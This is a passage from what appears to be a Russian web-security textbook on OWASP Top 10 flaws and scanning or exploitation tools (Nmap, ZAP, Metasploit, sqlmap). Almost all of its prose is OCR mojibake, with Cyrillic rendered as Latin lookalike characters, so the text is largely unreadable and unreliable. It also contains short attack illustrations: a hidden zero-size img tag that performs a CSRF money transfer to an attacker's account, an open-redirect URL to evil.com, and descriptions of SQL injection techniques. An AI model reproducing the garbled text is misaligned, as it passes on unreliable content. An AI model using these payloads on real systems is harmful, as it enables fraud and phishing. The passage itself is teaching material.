KOH(j)Hrypan,Ha MoaceT 6biTb Ha jik)6om ypoBHe ciCKa 
iipMJiO/KCi ihh (iijiai (])opMa, Be6-cepBep, E/J, (JjpenMBopKn). 
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• TCXIIHMCCKHC nOCJieflCTBHS - B03M0)KH0CTb nOJIHOH 
KOMnpOMeTaU,HH CHCTeMbI, H3MCIICIIH«/Kpa>KH flaHHbIX. 
Onpe/ieJieHHe yjoBHMOCTH 
Be6-npHJio>KeHHe MOJKeT 6biTb ys3BHMO, ccjih: 

1) Hcnojib3yeTca ycTapeBinee IIO (Be6-cepBep, CYEfl); 

2) BKJnoneHbi hjih ycTaHOBJieHbi HeHy>KHbie (fiyHKijHH h 
3JieMeHTbi (nopTbi, cjiy>ic6bi, yHCiiibic 3anHCH); 

3) BKJnoneHbi h He H3MeHeHbi ynciiibic 3anncH no 

yMOJin aHHio; 

4) CHCTeMa o6pa6oTKH oihhSok upc^ociaBJiMci 

nojib30Bai cjiaM Mpe3Mcpnyio HH(j)opMaLi,HK) 06 omnSKax; 

5) HacTpoHKH 6e3onacHOCTH b (JjpeHMBopicax h 
6H6jiHOTeKax He ycTaHOBJieHbi ^oji/Kiibim o6pa30M. 

IIpeaoTBpameHHe yjoBHMOCTH 

OcHOBHbie pcKOMcrwauMH 3aKJHonaK)Tca b CJic^yiomcM: 

1) Pa3pa6oTKa aBTOMaTH3HpoBaHHoro npou,ecca ycnjiciiHa 
6e3onacHOCTH, iioaBOJiHiomcro Sbicipo h Jierico pa3BepHyTb 
npnjio>KeHHe b npyioR cpe#e. 

2) PeryjiapHoe ooiiobjiciihc IIO h 3arpy3Ka HcnpaBJieHHH 
AJia Ka>KflOH Hcnojib3yeMOH cpeflbi. 

3) Hcnojib30BaHHe 6e3onacHOH apxHTeKTypbi, KOTopaa 

ooecneMHBacr nanC/Kiioc paa^ejiciiHC KOMiioncmoB. 

4) Pei yjiHpiibic CKaiiHpoBaiiHM h npoBepKH 6e3onacHOCTH. 
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IIpHMepw cpeHapneB aTaKii 

Cu,eHapHH N°l: yHcriibic 3araiCH no yMOjmaiiHio He 
H3MeHeHbi. AiaKyiouiMH o6Hapy>KHBaeT, hto crannapTiibic 
CTpaHHn,bi a^MHiiHCipaiopa iiaxo/oncx Ha BarneM cepBepe, 
bxo^ht b CHCTeMy c napojiaMH no yMOJinaiiHio h nojiynaeT 
nOJIHblH KOHTpOJIb HaCepBepOM. 

Cu,eHapHH N°2: cepBep npHJio>KeHHH nocTaBjiaeTca c 
npnMepaMH npHJio>KeHHH, KOTopbie He yflajunoTca c Barnero 
cepBepa. /Jamibic npnMepbi npHJio>KeHHH HMeiOT 
H3BeCTHbie ya3BHMOCTH, KOTOpbie MOryT 6bITb 
Hcnojib30BaHbi fljia ocymccTBJiciiMx aTaK. 

1.1.6. Sensitive Data Exposure (YTeuKa 

KpUTHHeCKHX /jaHHblx) 

MHorae BCO-npHJiovKeiiHM He aamumaioT 
KOH(f)HfleHH,HajibHbie namibic, iaKHC KaK Kpcum iibic KapTbi, 
HajioroBbie H^cmH(|iHKaiopbi h yiCTiibic iiamibic. 
AiaKyioiHHC Moryr KpacTb hjih MO^H(|inuHpoBaib iaKHC 
CJia6o aamumcinibic jiamibic. TaKHM .uamibiM ipeSyeiCH 
HonojiiiHicjibnax lamma, HanpnMep, imnfipoBaHHe npn 
xpaHeHHH hjih ncpejiaHC, a Taioice cneu,HajibHbie Mepbi 
npcjiociopo/Kiioci H npn o6MeHe c 6pay3epoM. 
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• BcKTopw aTaKH - aiaKyiouiHC oobimio He kpajiyx 
3aniH(J)poBaHHbie /lamibic iianpaMyio. Ohh kpanyi hto-to 
clhc - jiamibic c cepBepa npn iicpenaHC hjih npaMO H3 
6pay3epa nojib30BaTejia, a TaK>Ke ocymecTBjunoT aTaKH 
rana «nejiOBeK nocepejimio). 

• Cjia6bie MecTa cncTeMbi 6e3onacHOCTH - OTcyrcTBHe 
HIH(j)pOBaHHB KOH(f)HfleHH,HajIbHbIX flaHHbIX HJIH cjia6bie 
MCi ojibi HiHfJjpoBaHHB/xeiHHpoBaHHa napojien. 

• TeXHHHeCKHe IIOCJICJICTBMH - B03M0>KH0CTb 
KOMnpoMeTau,HH Bcex koiKln-fucimnajibiibix namibix. 

Onpe/ieJieHHe yH3BHMOCTH 
Be6-npHJio>KeHHe movkci 6biTb y»3BHMO, earn: 

1) jjamibic xpana iCH b hhctom bhjic juimcjibiioe BpeMa, b 
TOM HHCJie B pe3epBHbIX kOUHHX; 

2) jjamibic nepcjiaioTCH b hhctom bmjic; 

3) Hcnojib3yiOTca cjiaSbie MeTOflbi HiHtJjpoBaHHa; 

4) iciiepupyiOTca cjiaSbic kjhohh HiH(J)poBaHHa, hjih 
OT cyTCTByeT npaBHJibHoe yiipaBJicnnc KJiiOHaMH. 

IIpe/iOTBpameHHe yjoBHMOCTH 

JX-im 3amHTbI KOH(f)HfleHH,HajIbHbIX /jailllblX IICOOXOJJHMO 
npHJICp’A'HBai bCH CJICJiyiOLHCl O MHHHMyMB pCkOMClIJiailHii: 

1) Hcnojib3yirre HiHtJjpoBaHHe npn xpaHeHHH h iicpcnaHc; 

2) He xpaHHTe kpmimcckMC jiamibic 6e3 iicoSxouhmocth; 
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3) Mcnojibiymc ctomkhc ajiropHTMbi imn|)poBaHH»; 

4) xpaHHTe napojiH c noMombio ajiropHTMOB, 
iipcnHaanaHcmibix ^ji a hx 3amHTbi (bcrypt, Pbkdf2, scrypt); 

5) OTKJHOHHTe aBT03an0JIHeHHe (})OpM H KClHMpOBailHC flJIB 
CTpaHHII,, CO^ep’A'aLUHX KOH(J)HfleHLI,HajIbHbie nailllbic. 

IIpHMepbi cpeHapneB aTaKH 

IlpHJio>KeHHe uiH(|)pyc'i HOMepa Kpcnirnibix Kap i b E,fl, c 
noMombio aBiOMaiHHCCKoro imufipoBaHHa. 3 to oanaMaci, 
hto npoHCxo^HT aBiOMaiHHCCKaM pacniH(J)poBKa jjamibix 

npH H3BJICHCIIHH, HTO HOBBOJOiCT HCn0JIb30BaTb HlIbCKUHH H 

H3BJieKaTb HOMepa Kpenm iibix KapT b bhhc tckctb. 

1.1.7. Missing Function Level Access Control 
(OTcyTcmne KOHTpojm aocTyna k (JjyHKpnoHajibHOMy 
ypoBHio) 

BojibniHHCTBO Be6-npHJio>KeHHH npoBcpaioi jrociy 11 k 
ypoBHio (|)yHKii,HH. TeM He MeHee, npHjioaceHHa hoji/Kiibi 
B binojiHHTb Te /KC npoBepKH KompojiH xioci yiia Ha cepBepe 
npn oopauieiiHMx k (JjyHKipMM. Ecjih 3anpocbi He 
HOHIBep/KHClIbl, 3JIOyMbIHIJieHHHKH CMOryT HO^CJiaib 
3anpocbi fljia nocxyna k (|)yiiKHMH\i 6e3 aBTopH3au,HH. 

• BeKTOpbl aTaKH - aBT0pH30BaHHbIH 3JIOyMbIHIJieHHHK 
H3MeHaeT URL hjih napaMeTp Ha 3aKpbiTyio (ftymcipno. 


31 



• GnaStie MecTa cncTeMbi 6e3onacHOCTH - cjiaSaa 
3aLUHia (J)yHKII,HH IipHJIOVKCHHa, KOTOpaa MO>KeT 
ynpaBJiHibcx c noMombio KOH(j)Hrypaii,HH, a cncreMa iip m 
3tom mo/Kct 6bi i b HenpaBHJibHO HacTpoeHa. 

• TCXIIHMCCKHC nOCJieflCTBHS - B03M0>KH0CTb HOJiyHClIMX 

flOCTyna k aaKpbnoH (J)yHKu,HOHajibHOCTH, b tom hhcjic k 
aflMHHHCTpaTHBHbIM (J)yHKU,HBM. 

Onpe/ieJieHHe yjoBHMOCTH 
Be6-npnjio>KeHHe MO>KeT 6biTb y»3BHMO, ccjih: 

1) nojib30BaTejibCKHH HHTep<J)eHC OTo6pa>KaeT naBHi aunio 
no 3aKpbITOH (J)yHKLI,HOHajIbHOCTH; 

2) OTcyTCTByeT npoBepKa aBTopn3an,HH Ha cepBepe; 

3) cepBep BbinojmaeT npoBepKH, nonHOCTbio 3aBHCHLHHC 
OT HH(J)OpMan,HH, lipCHOCi aBJIHCMOH 3JIOyMbiniJieHHHKOM. 

IIpe/iOTBpameHHe yjoBHMOCTH 

fl,jia ycipanciiHa y»3BHMOCTen, Be6-npnjio>KeHHe 
flOJDKHO HMeTb CJICHyiOLHMC 3JieMeHTbi: 

1) Monyjib aHajiH3a aBTopn3an,HH, Bbi3biBaiomHHca H3 
Bcex (J)yHKLi,HH 6n3Hec-JiornKH; 

2) nerKO oonoBJiHCMbiH n TecTnpyeMbin MOflyjib 
ynpaBJieHna npaBaMn; 

3) MexaHH3M, xpeoyiomnH npcnociaBJiciiHC paapcuiciiHH 
npn nonbiTKe nocxyiia k c^yiiKunaM. 
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IIpHMepbi cpeHapneB aTaKH 

3jioyMbinuieHHHK npocMaTpHBaeT ucjicbbic URL-aapcca, 
Tpe6yiomHe ayreHTH(J)HKaii,HK). ,3,jia ziocryiia k cipaiiHuc 
admin_getappInfo ncooxoaHMbi npaBa aaMHiincipaiopa. 
http://example.com/app/getapplnfo 
http://example.com/app/admin_getapplnfo 

ECJIH HeaBT0pH30BaHHbIH n0JIb30BaTeJIb MO>KeT 
nojiyHHib yiocryir k jho 6 oh crpaiiHuc, sto aBjiaeTca 
y»3BHM0CTbK). ECJIH ayTeHTH(j)HII,HpOBaHHbIH K)3ep, He 
BBJHHOHtHHCa aflMHHHCTpaTOpOM, HMeeT flOCTyn K CTpaHHH,e 
admingetapplnfo, sto TaK>Ke hbjihctch y«3BMMOC i bio. 

1.1.8. Cross-Site Request Forgery (CSRF, no/i/ieJiKa 
MeaccauTOBbix 3anpocoB) 

CSRF-aTaica aaciaBJiaci aBTopH 30 BaHHbiH b CHCTeMe 
6pay3ep oxnpaBjm b i lozxytcji bi i bi id HTTP-3anpoc, 
BKJiioHaioHtHH ID ceaHca h apyiyio HH(J)opMau,HK) 06 
ayreHTH(J)HKaH,HH, Ha cepBep. 3 to iiobbojuict 3acTaBHTb 
6pay3ep >KepTBbi reHepHpoBaTb 3anpocbi, KOTopbie 
ya3BHMoe npHJio>KeHHe npn3HaeT jierHTHMHbiMH. 

• BeKTopbi aTaKH - axaKyiouiMH co3^aci nojwejibHbie 
HTTP-3anpocbi h BbiHyayjaeT acepTBy oxnpaBjm b hx wcpca 
Tern H3oopa>KcnHH, XSS hjih apyixie Mcioabi. 
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• Cnadbie 


MecTa 


CHCTeMbi 6e3onacHOCTH 


IipC^OCXaBJIClIHC lip HJIO/KCIIH a \1 H B03M0)KH0CTH 

npc^ycMO'i pci b Bee ncxajiH KOHKpeTHoro hcmctbmh. 

• Tcxiihhcckhc nocjieflCTBHa - aTaKyiomHH MO>KeT 
3acTaBHTb >KepTBy BbinojiHHTb jiioSyio oncpauHio no 
H3MeHeHHK) COCTOBHHa: BXOn B CHCTeMy, oSiiobjiciihc 
yneTHbix namibix, coBepmeHne (})HHaHCOBbix TpaH3aKn,nn. 
Onpe/ieJieHHe yjoBHMOCTH 

Be6-npnjio>KeHHe MO>KeT HMCib CSRF-ya3BHMOCTb, 
ecjin He HCiioJib3yioiCH ncnpcncKaaycMbic CSRF-TOKeHbi, 
6e3 KOTopbix 3JioyMbiniJieHHHKn jierKO Moryr C03naBaib 
BpeflOHOCHbie 3anpocbi. Ctoht o6paTHTb oco6oe BHHMaHne 
Ha 3ammy (f)yHKH,HH hbmciicmhh coctobhhb aiocayHTa. 
IIpe/iOTBpameHHe yjoBHMOCTH 

npcHOiBpauiciiHC CSRF-y«3BHMOC'iCH oSbimio ipcSyci 
BKJHoneHHB yHHKajibHoro fljia xa>Kfloro ceaHca 
n c 11 p chc k a3yc m o ro TOKeHa b Kanc^biH HTTP-3anpoc. 

1) ripcHiiOH'iHicjibiibiH Bapnam - bkjiiohciihc TOKeHa b 
CK pbiToe none (oTnpaBjiaeTca b tcjic 3anpoca). 

2) Hcnonb30BaHHe OWASP CSRF Guard, aBTOMaTHnecKH 
BKjnoMaiouiero TOKeHbi b Java EE, .NET npHJionceHHn, h 
mctohob npcnoi BpauieiiHa CSRF-aTaK H3 ESAPI OWASP. 

3) TpcooBanuc ot K)3epa noB i opnou ayi cm n(l)MKauMn. 

34 



IIpHMepbi cueHapnee aTaKH 

ripHJiO/KCiiHC nosBOJixc'i K)3epy OTnpaBHTb 3anpoc Ha 
H3MeHeHHe coctohiimk, He coflepacamHH iihhci o ceKpeTHoro 
http://example.com/transfer?amount=1500&destAccount=46732243 

3jIOyMbIHIJieHHHK C03aaCT 3anpOC, IICpCBO,U5HHMH aCIIBI H 
co cm era /Kcp i Bbi Ha ero chct, a 3aTeM noSaBJiacT 3Ty araKy 
b 3anpoc Ha n3o6pa>KCiinc, xpanauiccca Ha ero caHTe: 

<lmg src="http://example.com/transfer?amount=1500&destAccount= 
attackersAcct#" width = "0" height = "0" /> 

Ecjih acepTBa noceuiaci caihbi 3JioyMbinuieHHHKa nocjie 
npoxo/KaciiHa ayieiriH(|)HKaHHH Ha example.com, 
no/mcjibiibic 3anpocbi BKjnoiaiOT HH(f)opMau,HK) o ceaHce, 
paapciuaa 3anpoc 3JioyMbimjieHHHKa. 

1.1.9. Using Components with Known Vulnerabilities 
(HcnoJib30BaHne KOMnoHeHTon c H3BecTHbiMH 
yfl3BHMOCTHMH) 

KoMnOHeHTbl, TaKHe KaK 6 m6jIHOTCKH, (jjpCMMBOpKH H 
nporpaMMHbie MO/tyjm, 3aHacTyio paSoiaioT c aocryiiOM k 
T iaHHbiM. Ecjih Hciiojibaycica ya3BHMbin komhohcht, aTaKH 
Ha Hero Moryr noaopBai b 3amHTy Bcero npujiO/Kcnna. 

• BeKTopbi aTaKH - araKyiomHH onpcacjiacr ya3BHMbiH 
KOMnoHeHT, HacTpaHBaeT okciijioht h Bbiiiojinaci aTaKy. 
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• Cjia6tie MecTa CHCTeMbi 6e3onacHOCTH - ycTapeBimie 
KOMIIOHeHTbl, a TaiOKe KOMHOHeHTbl, BKJlIOHaiOLHMC B CCOH 
npyrne y»3BHMbie KOMnoHeHTbi. 

• TCXIIHMCCKHC nOCJieflCTBHB - 3aBHCBT OT THna 
y«3BHM0CTCH B yH3BHMbIX KOMnOHeHTaX. 

Onpe/ieJieHHe yjoBHMOCTH 

TeopcxHHCCKM, jierKO onpcncjimb, Hcnojibayioica jih b 
npmio>KeHHH ya3BHMbie KOMnoHeHTbi. Ho, k coacajieHHio, 
He Rim Bcex 6 m 6 jihotck ecTb o i nci bi 06 ya3BHMOCTax, He 
Bcer^a tohho onpenejieHbi BepcHH KOMnoHeHTOB, b 
KOTO pbIX eCTb ya3BHMOCTH. 

IIpe/iOTBpameHHe yjoBHMOCTH 

OflHH H3 BapnamoB ycipanciiHa naimoR y»3BHMOCTH - 
He Hcnojib30BaTb KOMnoHeHTbi, naiiHcamibic He BaMH, ho 
3TO He OHClIb-TO peajIHCTHHHO. MlIOl HC pa3pa6oTHHKH He 
y CTp aHJHOT ya3BHMOCTH B CTapbIX BCpCHHX, nOOTOMy 
CJienycT oSnoBJiaib Bee Hcnojib3yeMbie KOMnoHeHTbi ho 
IIOCJICHIIHX BepCHH. XopOLUCH npaKTHKOH OyUCT 
BbinojiHeHHe CJicnyiomux yKaaaiiHH: 

1) Onpcncjim c Bee Hcnojib3yeMbie KOMnoHeHTbi. 

2) CjieHHTe 3a cbokhmh OTHcrawH 06 hx 6e3onacHOCTH. 

3) y CTaHOBHTe nOJIHTHKH 6e30naCH0CTH, pei yJIHpyiOLHMC 
Hcnojib30BaHHe komiioiiciitob. 
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IIpHMepbi cpeHapneB aTaKH 

KoMnoHeHTHbie ya 3 bhmocth Moryr Bbi3biBaTb 
npaKTHHeCKH JIIOOOM B03M0)KHbIH pHCK. KOMnOHeHTbl 
3aiiycKaioiCH c nonHbiM /locryiiOM k ^amibivi h 
(J)yHKu,HOHajibHOCTH upHJiovKCiiHa, nosTOMy aKXiiJiyaiauHa 
ya3BHMOCTeH MO>KeT HMeTb cepbe3Hbie hocjichctbmh. 

1.1.10. Unvalidated Redirects and Forwards 
(HenpoBepeHHbie nepeHanpaBJieHHH n nepexo/ibi) 

Beo-npHJiovKCiiHa Macro nepeiianpaBJiHior 

noj[b30BarcjiCH Ha ^pyrne CTpaHHu,bi h BeS-canibi, 
Hcnojib3ya i ip m stom iicnanC/Kiibic /lamibic 

onpcacjiciiMx u,ejieBbix CTpaHHu,. Be3 Ha^neacameH 
npoBepKH 3JioyMbimjieHHHKH Moryr nepeiianpaBJia i b >KepTB 
Ha caiiTbi (J)HHiHHra hjih Bpcaonocnoro IIO. 

• BeKTopbi aTaKH - aiaKyiouiMH iiohmciuict 6e3onacHyio 
ccbuiKy Ha HenpoBepeHHyio CTpaHHH,y. TKcpiBa ncpexozim 
no ccbuiKe h, k npHMepy, oci aBJiaci cboh jiHHHbie jiamibic. 

• CjiaSbie MecTa CHCTeMbi 6e3onacHOCTH 

ncnpoBcpHCMbic napaMeTpbi nepcnanpaBJiciiHa Ha 

flpyrne pecypcbi. 

• TeXHHHeCKHe lIOCJICaCTBMH - B03M0>KH0CTb Kpa>KH 

yHCiiibix jiamibix, a TaK>Ke o6xofl Kompona .uocxyiia. 
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OnpeaejieHiie yjoeiiMocTii 

fl,jia onpcjtcjicnux, ys3BHM0 jih npHJiOKCiiHC, 
nocMOTpHTe ko/i nepeHanpaBJieHHH h nepecbiJioK fljia 
Ka>Kfloro Hcnojib30BaHHa h npoBepbTe, bkj[iomcii jih 
u,ejieBOH URL b jiioSwc inaicnmi napaMeTpoB. Ecjih sto 
T aK, h npn 3 tom u,ejieBOH URL He bxoaht b «6ejibiH» 
cnncoK, to, BeponTHO, npHJio>KeHHe ya3BHMO. 
IIpe/iOTBpameHHe yH3BHMOCTH 

Be3onacHoe Hcnojib30BaHHe nepea^pecaitHH mojkct 
6biTb BbinojiHeHO HecKOJibKHMH cnoco6aMH: 

1) IlpocTO He Hcnojib3yHTe iicpcaupccaumo h nepecbuiKy. 

2) Ecjih Hcnojib3yeTe, He BKjnoiamc nojib30BaTejibCKHe 
napaMeTpbi npn BbiHHCJieHHH ajjpecaia. 

3) Ecjih napaMeTpbi He Moryr 6biTb ycTpaHeHbi, 
yScjiHi ecb, mo iipcjioc'i aBJicmioe inaiciiHC /iciiCTBm cjibno 
h pa3pemeHO juia nojibiOBaicjia. PcKOMCiuiyciea, mo6bi 
TaKne napaMeTpbi owjih iickhmh 3HaneHH»MH, a He 
(JjaKTHnecKHMH aupccaMH. 

IIpHMepbi cpeHapneB araivii 

IlpHJio>KeHHe HMeeT CTpaHHiiy «redirect.jsp», HMeiomyio 
napaMeTp «url». 3jioyMbinuieHHHK nepcjiaci b napaMeTp 
ajtpcc, iiepcnanpaBJonoLHHH K)3epoB Ha Bpejtonociibiii cairr. 
http://www.example.com/redirect.jspPurEevil.com 
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1.2. HHCTpyMeHTbi ^jih noncKa yjnBHMOCTeii 

fln* o 6 h ap y>K e hhh y»3BHMOCTeH oSbihiio Hcnojibiyioica 
HHCTpyMeHTbi TecTHpoBaHHa Ha npoHHKHOBeHHe Be6- 
npHJio>KeHHH Ha ocHOBe npHHii,Hna «Hepnoro xmnKa». 
OcHOBHbie KaTeropHH tbkhx HHCTpyMeHTOB: 

1) ceTeBbie CKaHepbi; 

2) CKaHepbi ya3BHMOCTeH; 

3) TKXiiJiyaiauHM ya3BHMOCTeH; 

4) HHbeKH,HH; 

5) zicSancpbi. 

Bee 3 th HHCTpyMeHTbi HcnojibByioica KaK 
eneii,HajiHCTaMH no HH<J)opMaii,HOHHOH 6e3onacHOCTH, TaK h 
C aMHMH 3JIOyMbIIHJieHHHKaMH. 

1.2.1. CeTeBbie CKaHepbi 

CeTeBbie CKaHepbi npH3BaHbi onpe/icjimb ziociymibic 
ceTeBbie eepBHCbi h nopTbi, KOMnoHeHTbi h hx BepcHH. 

IlonyjiapHbiM upc/iciaBHicjiCM ceTeBbix CKaHepoB 
BBJHieTca oeciuiaiHan yTHJiHTa Nmap. Nmap - sto 
paciHHpseMbiH naoop HHCTpyMeHTOB 31 jib cKaHHpoBaHHa 
cera h npoBepKH 6e3onacHOCTH. Mo>KeT Hcnojib30BaTbca 
fljia onpezicJicnHa 3anymeHHbix Ha y3Jie eepBHCOB, BepcHH 
OC h npHJio>KeHHH, Me>KceTeBoro 3KpaHa. 
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1.2.2. CicaHepbi yjoBiiMOCTeii 

CicaHepbi y«3BHM0CiCH npc^nainaMcnbi /pia noncica 
nonyjiapHbix y»3BHMOCTeH inna SQL-mrbCKUMH, XSS, a 
TaK>Ke pa3JiHHHbix flonymeHHbix pa3pa6oTHHKOM oihh6ok 
Bpo^ic He ynajicmibix BpeMeHHbix hjih TecTOBbix (J)aHJiOB. 

IlpHMepoM Taxoro HHCTpyMeHTa sBJiaeTca npocKi 
OWASP Zed Attack Proxy (ZAP). ZAP - sto 

OCClIJiaillblH HHCTpyMeHT C OTKpbITbIM HCXOflHbIM KOflOM, 
npeflHa3HaneHHbiH ^jui iccinpoBaiiHa Be6-npHJio>KeHHH Ha 
npoHHKHOBeHHe. ZAP hbjihcich iiepexBaibiBaiouiHM 
npoKCH h pacnojiai aci ca b ccih MC>K^y 6pay3epoM TecTepa 
h Be6-npHJio>KeHHeM Tax, mtoSbi mo>kho 6bmo 
nepexBaTbiBaTb h npoBcpaib 3anpocbi kjihciii a h oibcibi 
cepBepa, MonHcliHunpoBaib hx b cjiynae iicooxozihmocth, a 
3aTeM flocTaBJiaTb hx b nyHKT naanaMcnHH. ZAP MO>KeT 
Hcnoj[b30BaibCM fljia ocymecTBjieHHa araK «hcjiobck 
nocepeflHHe». Ecjih b ccih npHcyrcTByeT erne o#hh 
npoKCH-cepBep, HanpHMep, b KopnopaTHBHOH cpe#e, ZAP 
MO>KHO HaCTpOHTb flJUI nO^KJHOHCHHH K 3TOMy npOKCH. ZAP 
HMeeT npocTOH Hincp(|)CHC h mo>kct Hcnojib30BaTbca 
JHoSbIM HOBHHKOM C MHHHMBJIbHblM OnbITOM TCCTHpOBailHH 
npHJIO>KeHHH, HO npn 3TOM MHO)KeCTBO napaMeTpOB 3HIB 
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i ipoBCzici i mm aKTHBHoro CKaiinpoBaiiMH ncjiacr ero 
nojie3HbiM h fljia cneu,HajiHCTOB no 6e3onacHOcm. 

Ilcpcn 3KcnjiyaTan,Hen neooxoHHMO HacTponTb 6pay3ep 
fljia ncnojib30BaHna ZAP b KancciBC npoKcn. Ilocjie 
HacTpoHKn yScnHiccb, hto TecrapyeMoe Be6-npnjio>KeHHe 
3aiiycKaciCM b 6pay3epe, a 3aTeM mo>kho npncTynaTb k 
CKaHnpoBaHHK). 

ZAP HMeeT 6e3onacHbin pe>KHM ^jib npcnompaLnciiHa 
H3MeHeHna namibix b Be6-npnjio>KeHHH, TaK KaK 
CKaHnpoBaHne hbjihctch c h m yj in h m c ii peanbHon aTaKn, a 

3HaHHT MO/KCT 6bITb lIOBpC/KnClia (J)yHKII,HOHajIbHOCTb Be6- 
npHJiovKCHHa hjih 6a3a namibix, KaK n npn peanbHon aTaKe. 

HanSojiee npocTon cnoco6 ncnojib30BaHna ZAP - 
fjbiCTpbin 3anycK. Bbi npocTO BbiSupacrc URL Be6- 
npnjio>KeHHB ^jm aTaKn n Ha>KHMaeTe Ha KHonKy «Attack». 
IIporpaMMa 3anycTHT nayKa hjih nocTpoemia .ucpcBa 
CTpaHHu, cairra, a nocne 3anycTHTca naccnBHoe 
CKaHnpoBaHne. Ilpn CKaHnpoBaHHn npoBepaiOTca 3anpocbi 
n OTBeTbi fljia Ka>Kflon H3 CTpaHnn,, n, ecnn c hhmh hto-to 
He TaK, i cnepHpyioiCH onoBememia. OnoBeuieiiHH ncjmca 
no ypoBHBM pncKa: bbicokhh, cpe^Hnn, hh3khh. 

naccnBHoe CKaHnpoBaHne He MOHH(|)HUHpyc'i 3anpocbi h 
OTBeTbi h CHHTaeTCK 6e3onacHbiM ^ Jia nainibix h caMoro 
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npHJio>KeHH». Oho hohxohmt ^jih iiaxo/Knciimi HeKOTopbix 
6a30Bbix ya'jBHMOCiCH. Akthbhoc CKanupoBaiiHC no cym 
HBJiacica peajibHOH arakon, HanpHMep SQL hjih XSS, hto 
CTaBHT flaHHbie no# yrpo3y. Akthbhoc CKaHHpoBaHHe 

CJICayCT npOBOflHTb TOJIbKO Ha BCO-npMJIOVKCnnaX, 
pa3pemeHHe Ha TecTHpoBaHne KOTopbix y Bac ecTb. 

1.2.3. OKcnjiyaTauHH yjoBiiMOCTeft 

Ok'diJiyaiauHa yxBBMMOCTCH ocymecTBjiaeTca c 

nOMOmbK) CneU,HajIbHbIX HHCTpyMCHTOB C rOTOBbIMH 
OKCnJIOHTaMH, B KOTOpbie Hy>KHO npOCTO ncpcaaib 
ncooxoHHMbic napaMeTpbi ana Hcnojib30BaHHa ya3BHMOCTH. 

0#HHM H3 TBKHX HHCTpyMCHTOB HBJIHCTCH MetaSploit 
Framework. 3to ScciuianibiH npocKi #ji» naiiHcaiiMH, 
OTJiaflKH h aBTOMaTHnecKoro 3anycKa okxiijiohiob. ,Z],jia 
Ka>KHoro OKcmioma mo>kho BbiSpaib hcmctbhc, 
BbinojimiCMOC b cjiynae ycneuiHOH arakH. 

IlpHMep cucnapnH aTaKn: 

1) BbiSop h HacTpoHKa OKcnjiOHTa; 

2) npoBepKa okxiuiOH i a Ha iipmoanocTb ana chctcmm; 

3) BbiSop h HacTpoHKa napaMeTpoB; 

4) BbiSop ajiropHTMa uiH(|)poBanH« # jib ooxoaa 
CHCTeMbi oonapy/KCiiHM b'iop’axiihh; 
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5) HcnojiHeHHe 3iccnjiOHTa. 


1.2.4. Hm>eKUHH 

noHCKa y» 3 BHMOCTeH rana hiibckumh cymecTByiOT 
cncuHajiHBupoBamibic HHCTpyMeHTbi. L I aero Taicne 
HHCTpyMeHTti MoryT SKcmiyarapoBaTb uamibic y» 3 BHMOcra 
hjih jraBaib pcKOMcnaaijHH no nx 3 KcnjiyaTan,nn. 

OflHHM H 3 M 0 mIICHmHX 6 eCnJiaTHbIX HHCTpyMeHTOB c 
OTKpbITbIM HCXOflHbIM KOflOM flJM aBIOMaiHHCCKOlO 
BblHBJIClIHa H 3 KCIIJiyaTMpOBai[M« yH 3 BHMOC'ICH HBJIHCTCH 
sqlmap. 3™ yinjinia nozurcp>KMBacT aiCHyioiune CYE/L 
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, 
Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP 
MaxDB n HSQLDB. Sqlmap MO>KeT: 

• onpcncjia i b n,ejieByio CYB/f; 

• nojiynaTb cnncox 6a3 namibix, Tadjinn, n ctoji6h,ob; 

• nejiaxb nojiHbin hjih nacTHHHbiH aaMii 6 a 3 bi jramibix; 

• H 3 BJieKaTb HMeHa h xchjh napojieii nojib 30 BaTejieii; 

• pacno3HaBaTb ran Hcnojib3yeMoro xema. 
nioZmCp>KMBaiOTCfl CJICnyiOUIMC TCXHHKH SQL-HHbeKH,HH: 

1) UNION query-based (ocHOBamiaa Ha 3 anpoce 

UNION). KjiaccHnecKHH npnMep HHbeKu,HH, Korjra b 

y»3BHMbiH napaMeTp nepcnacica apryMcm, 
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HaHHHaiomHHCs c «UNION ALL SELECT)). Taxon mctoa 
paSo'iaci, xoiyja bco-iiphjiovkciihc bbibo^ht Bbidpamibic 
3anncn nocjicaoBaicjibiio up a mo Ha CTparomy. 

2) Error-based (ocHOBaHHaa Ha ornndxe). B ^aHHOM 
CJiynae cicaHep nepcaaci b ya3BHMbin napaMeTp 
CHHTaKCHnecKH HeBepHoe BbipaaceHne, a 3aTeM 
aHajiH3HpyeT HTTP-oibci b noncKax onindox CYE,T, 
coflepacaniHx ncpeaamioe BbipaaceHne. 3Ta rex 11 n xa 
paSoxacT, xoiyja npnjioaceHne pacxpbiBaeT ohihSkh CY Bd,- 

3) Stacked queries (Miioi ociyuciiMaibic 3anpocbi). B otom 
CJiyuae nponcxoflHT npoBepica noaqepacxn 
nocjicaoBarcjibnbix 3anpocoB. Ecjih ohh Bbinojinaioica, b 
y»3BHMbiH napaMeTp ^odaBJiaioi Tonxy c 3anaioii (;), 3 a 
KOTopoM CJieayex BHe^paeMbiH SQL-3anpoc. flaHHaa 
TexHHKa Hcnojib3ycica jtjih ynpaBjieHna aamibiMu. 

4) Boolean-based blind (cirenaa Jiornnecxaa). Pcajin3anna 
CJienon HHbeKn,HH, to ecTb aamibic H3 Ed, b Be6- 
npnjio>KeHHH uuiac He B03Bpainai0'ica b hhctom bh^c. 
Taxon mctozi Taxace naabiBacica acayKiuBiibiM. B 
ya3BHMbin napaMeTp .aodaBJiacTca cnHTaKcnnecKH BepHoe 
Bbipa/Kcnue c uoaaanpocoM SELECT hjih jho6oh apyi oii 
KOManaoii jtjim Bbi6opxn. nojiyneHHbin otbct cpaBHHBaeTca 
c OTBeTOM Ha ncxoflHbin 3anpoc - Tax yTHJIHTa MO>XeT 
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nocHMBOJibHO onpefleuHTb bbiboa Biicnpcmioro 
Bbipa/KCiiHM. Taioice mo>kho nepcnaBaib 3anpocbi ajui 
onpc^cJiciiMa true-CTpaHHu,, orciona h naBBainic icxiihkh. 

5) Time-based blind (cnenaa, ocnoBamiaa Ha BpeMeHH). 
PcajmaauHH nojiHOCTbio cjienoii HHbeKUHH. Otjihhhc ot 
CJ ienoii jioraHecKoii 3aKjnoHaeTC» b tom, hto ^odaBJiaeTca 
nofl3anpoc, aaciaBJiaiouiMH CYB/l npHOCTaHOBHTb padoiy 
Ha onpcHCJicmioe Bpc\ia, HanpnMep, KOManaoii SLEEP(). 
CKaHep mojkct H3BJienb /lamibic H3 6a3bi namibix, 
cpaBHHBaa Bpexia OTKJiHKa Ha 3anpocbi. 

1.2.5. ^edarrepbi 

